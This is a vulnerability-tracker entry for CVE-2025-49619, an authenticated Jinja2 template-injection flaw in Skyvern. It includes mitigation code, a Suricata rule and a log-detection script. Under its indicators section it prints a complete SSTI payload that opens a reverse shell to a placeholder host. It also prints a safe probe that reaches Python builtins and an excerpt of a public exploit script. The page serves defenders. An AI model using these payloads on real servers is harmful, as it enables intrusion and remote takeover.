CVE-2025-49619
Published 2025-06-07
Priority: P1 82 · high
CVSS 3.1: 8.5 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N)
In the wild: listed in VulnCheck KEV (exploited in the wild)
EPSS: 13.75% (96.0th percentile)
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).
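The root cause the description names is that the prompt string is compiled as a Jinja2 template instead of being handed to one as data. The following is an added example, not Skyvern's code (the page only locates the bug in sdk/workflow/models/block.py): it renders a constructed, non-destructive probe of the same shape as the indexed payload three ways, through a plain `Environment` (evaluated, reaches `__builtins__`), through `SandboxedEnvironment` (refused with `SecurityError`), and with the prompt passed as a variable into a fixed template (delimiters never parsed). The function names, the probe and the sample parameters are assumptions made for illustration.

```python
"""Added example (not Skyvern's code): three ways of handling a user-controlled
workflow "prompt" that may contain Jinja2 syntax. Function names, the probe
string and the sample parameters are assumptions for illustration."""
import warnings  # makes sure warnings.catch_warnings is loaded as an object subclass

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed probe with the same shape as the indexed payload: walk
# object.__subclasses__() to warnings.catch_warnings, whose instances keep a
# reference to the warnings module and therefore to __builtins__. Instead of
# calling os.popen() it only reports whether __import__ is reachable.
PROBE = (
    "{% for x in ().__class__.__base__.__subclasses__() %}"
    "{% if x.__name__ == 'catch_warnings' %}"
    "{{ 'builtins:' ~ ('__import__' in x()._module.__builtins__) }}"
    "{% endif %}"
    "{% endfor %}"
)


def render_vulnerable(prompt: str, params: dict) -> str:
    """The prompt *is* the template: every {{ }} / {% %} it carries is
    evaluated server-side with unrestricted attribute access (the bug)."""
    return Environment().from_string(prompt).render(**params)


def render_sandboxed(prompt: str, params: dict) -> str:
    """Same design, but SandboxedEnvironment refuses attribute names that
    start with '_' and raises SecurityError. A mitigation, not a fix: the
    prompt is still executed as code and sandbox bypasses have existed."""
    return SandboxedEnvironment().from_string(prompt).render(**params)


def sandbox_blocks(prompt: str) -> bool:
    """True when the sandbox refuses to render the prompt."""
    try:
        render_sandboxed(prompt, {})
    except SecurityError:
        return True
    return False


def render_as_data(prompt: str, params: dict) -> str:
    """The fix: the template is fixed text owned by the application and the
    prompt is an ordinary variable, so its delimiters are never parsed."""
    template = Environment().from_string("Task for {{ target }}: {{ prompt }}")
    return template.render(prompt=prompt, **params)


if __name__ == "__main__":
    print(render_vulnerable(PROBE, {}))            # builtins:True
    print("sandbox refused:", sandbox_blocks(PROBE))
    print(render_as_data(PROBE, {"target": "example.org"}))
```

The third form is the one to ship: if parameter substitution in prompts is required, the application's own template references the parameters and the user text is only ever a value. Sandboxing is a defence in depth on top of that, not a replacement for it.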
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| skyvern | skyvern | <= 0.1.85 | — |
| skyvern | skyvern | 0 – 0.2.0 | — |
Detection & IOCs (extracted from sources)

URL: /api/v1/workflows

Command (Jinja2 SSTI payload: walks object.__subclasses__() to a class that exposes `__builtins__`, then uses os.popen() to start a reverse shell to `<ip>`:`<port>`):

```jinja
{% for x in ().__class__.__base__.__subclasses__() %}
{% if 'warning' in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen(
"python3 -c 'import socket,os,pty;"
"s=socket.socket();"
"s.connect((\"<ip>\",<port>));"
"os.dup2(s.fileno(),0);"
"os.dup2(s.fileno(),1);"
"os.dup2(s.fileno(),2);"
"pty.spawn(\"sh\")'"
).read() }}
{% endif %}
{% endfor %}
```
Snort/Suricata rule (ET sid 2064150):
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/workflows"; fast_pattern; http.request_body; content:"prompt"; content:"|7b|"; distance:0; pcre:"/((?<=(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f))\x7b|\x7b(?:\x25|\x23|\x2f))[\x20-\x7e]+/"; reference:url,attackerkb.com/topics/4Hq1jtfYEq/cve-2025-49619; reference:cve,2025-49619; classtype:web-application-attack; sid:2064150; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_08_25, cve CVE_2025_49619, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_08_25, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Detect POST requests to /api/v1/workflows containing a `prompt` field with Jinja2 template-injection characters (`{{`, `{%`, `{#`). The Snort rule's pcre matches a `{` that is preceded by one of `{`, `$`, `#`, `~`, `@`, `*`, `%`, `_` or followed by `%`, `#`, `/`.
- The exploit workflow uses block_type `task_v2` with a crafted `prompt` field containing a Jinja2 SSTI payload that walks Python's `__subclasses__()` chain to reach `os.popen()` for RCE. Monitor workflow-creation API calls for these patterns.
- The exploit requires an authenticated API key passed in the `X-API-Key` header. Anomalous workflow creation (POST /api/v1/workflows) followed immediately by execution (POST /api/v1/workflows/{id}/run) from the same API key is a strong behavioral indicator.
- TLS decryption is required for effective detection per the Snort rule metadata (`tls_state TLSDecrypt`). Ensure inspection is performed on decrypted traffic at the perimeter and internally.
- The vulnerability affects Skyvern versions through 0.1.85 (the Metasploit module targets <= 0.1.84). Exploitation requires a valid API key: this is an authenticated vulnerability, not unauthenticated RCE.
- The injection point is specifically the `Prompt` field of workflow blocks such as the Navigation v2 block and the `task_v2` block type. Other block types may also be affected if they process Jinja2 templates.
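The indicators above combine a content match (the ET rule's pcre over the request body) with a behavioral one (workflow creation followed by a run from the same API key). The following is an added example, not code from the page or from Proofpoint: it reimplements both checks in Python over a handful of constructed request-log records so the logic can be tried offline. The record shape, the 60-second correlation window and the `/api/v1/workflows/{id}/run` path (taken from the bullet above) are assumptions.

```python
"""Added example (not from the page or its sources): the ET rule's body match
plus the create-then-run correlation, applied to constructed request records.
Record shape, window length and field names are assumptions."""
import json
import re

# Character classes copied from the ET rule's pcre: a '{' preceded by one of
# { $ # ~ @ * % _  or followed by one of % # /  and then printable text.
TEMPLATE_DELIM = re.compile(
    r"((?<=[\x7b\x24\x23\x7e\x40\x2a\x25\x5f])\x7b|\x7b[\x25\x23\x2f])[\x20-\x7e]+"
)
CREATE_URI = re.compile(r"^/api/v1/workflows/?$")
RUN_URI = re.compile(r"^/api/v1/workflows/[^/]+/run$")  # assumed path shape


def body_has_template_delims(body: str) -> bool:
    """Mirror of the rule's body checks: the literal 'prompt', a '{' somewhere
    after it, and the pcre anywhere in the body. Ordinary JSON nesting ('{"'
    or ': {') does not satisfy the pcre, so a plain workflow body does not fire."""
    idx = body.find("prompt")
    if idx < 0 or "{" not in body[idx:]:
        return False
    return TEMPLATE_DELIM.search(body) is not None


def analyze(requests, window_s=60):
    """Return (finding, request_id, api_key) tuples. Requests are dicts with
    id, method, uri, api_key, ts (seconds) and body, in time order."""
    findings = []
    last_create = {}  # api_key -> ts of that key's most recent workflow creation
    for r in requests:
        if r["method"] != "POST":
            continue
        if CREATE_URI.match(r["uri"]):
            if body_has_template_delims(r["body"]):
                findings.append(("ssti_payload", r["id"], r["api_key"]))
            last_create[r["api_key"]] = r["ts"]
        elif RUN_URI.match(r["uri"]):
            t0 = last_create.get(r["api_key"])
            if t0 is not None and 0 <= r["ts"] - t0 <= window_s:
                findings.append(("create_then_run", r["id"], r["api_key"]))
    return findings


def _workflow_body(prompt: str) -> str:
    # Constructed body in the shape the bullets describe: a task_v2 block with a prompt.
    return json.dumps({"title": "wf", "workflow_definition": {"blocks": [
        {"block_type": "task_v2", "prompt": prompt}]}})


# Constructed sample traffic: one benign workflow, one carrying the payload shape,
# a prompt run from the same key, and a late run from the benign key.
SAMPLE_REQUESTS = [
    {"id": 1, "method": "POST", "uri": "/api/v1/workflows", "api_key": "key-A", "ts": 100,
     "body": _workflow_body("Log in and download the latest invoice")},
    {"id": 2, "method": "POST", "uri": "/api/v1/workflows", "api_key": "key-B", "ts": 105,
     "body": _workflow_body("{% for x in ().__class__.__base__.__subclasses__() %}{{ x }}{% endfor %}")},
    {"id": 3, "method": "POST", "uri": "/api/v1/workflows/wpid_1/run", "api_key": "key-B", "ts": 107, "body": ""},
    {"id": 4, "method": "POST", "uri": "/api/v1/workflows/wpid_2/run", "api_key": "key-A", "ts": 900, "body": ""},
    {"id": 5, "method": "GET", "uri": "/api/v1/workflows", "api_key": "key-A", "ts": 901, "body": ""},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_REQUESTS):
        print(finding)
```

Two caveats when moving this onto real logs: the content check is purely syntactic, so any legitimate `{{ … }}` in a prompt matches it and will need tuning, and the correlation keys on the API key, which should be stored hashed rather than in the clear in whatever log the detection reads. Both checks only see the body if the traffic is decrypted first, as the rule metadata notes.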
CVSS provenance
NVD (v3.1): 8.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
VulnCheck: 8.5 HIGH
OSV
osv · 2025-06-07 · CVE-2025-49619 [HIGH] Skyvern has a Jinja runtime leak
Skyvern through 0.2.0 has a Jinja runtime leak in sdk/workflow/models/block.py.
GHSA
ghsa · 2025-06-07 · CVE-2025-49619 [HIGH] · CWE-1336 · Skyvern has a Jinja runtime leak
Skyvern through 0.2.0 has a Jinja runtime leak in sdk/workflow/models/block.py.
VulnCheck
vulncheck · 2025 · CVSS 8.5 · CVE-2025-49619 [HIGH] Improper Neutralization of Special Elements Used in a Template Engine
Description: as in the summary above (SSTI in the Prompt field of workflow blocks, authenticated, blind RCE).
Affected: Skyvern Skyvern
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-49619
Exploit PoC: https://vulncheck.com/xdb/3f7a05965f9e
Suricata
suricata · 2025-08-25 · CVSS 8.5 · CVE-2025-49619 [HIGH] ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)
Rule: sid 2064150, rev 1 (full rule text under Detection & IOCs above).
Exploit-DB
exploitdb · 2025-06-15 · CVSS 8.5 · CVE-2025-49619 [HIGH] Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

```python
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: …
…help="Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")

def create_exploit_workflow(url, ip, port, x_api_key):
    exploit_workflow = {
        "title": "Exploit",
        "description": "",
        "proxy_location": "RESIDENTIAL",
        "webhook_callback_url": "",
        "persist_browser_session": False,
        "model": None,
        "totp_verification_url…
```
Metasploit
Skyvern SSTI Remote Code Execution
This module exploits an SSTI vulnerability in Skyvern <= 0.1.84. The module requires an API key to deliver requests and upload a malicious workflow.
No writeups or analysis indexed.